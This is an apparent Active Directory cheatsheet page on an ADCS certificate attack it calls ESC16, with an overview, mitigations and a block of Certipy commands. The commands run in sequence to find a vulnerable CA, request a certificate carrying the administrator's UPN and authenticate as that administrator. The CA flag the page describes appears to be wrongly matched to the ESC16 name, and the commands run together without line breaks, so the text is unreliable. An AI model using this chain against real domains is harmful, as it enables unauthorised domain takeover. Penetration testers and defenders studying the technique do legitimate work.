Esc16
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
ESC16 is an ADCS attack that exploits the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA server. When enabled, this allows certificate enrollees to specify Subject Alternative Names in their certificate requests, even on templates without CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT.
This enables privilege escalation by requesting certificates with arbitrary UPNs.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Esc16:
certipy find -u user@domain.local -p 'password' -dc-ip 10.10.10.10 -vulnerablecertipy ca -ca 'CA-NAME' -list-templates -u user@domain.local -p 'password' -dc-ip 10.10.10.10certipy req -u user@domain.local -p 'password' -ca 'CA-NAME' -target 'CA.domain.local' -template User -upn 'administrator@domain.local'certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10Tools & Techniques
Recommended tools for Esc16:
- Certipy: ADCS exploitation toolkit
- Identify CA with EDITF_ATTRIBUTESUBJECTALTNAME2 flag
- Template must allow enrollment by the attacker
- Request certificate with victim UPN in SAN
Prevention & Mitigation
Security recommendations to prevent Esc16:
- Disable EDITF_ATTRIBUTESUBJECTALTNAME2 CA flag
- Audit CA configuration for dangerous settings
- Implement proper CA security with Tier 0 controls
- Monitor CA logs for certificate requests with unusual SANs
References
Additional resources: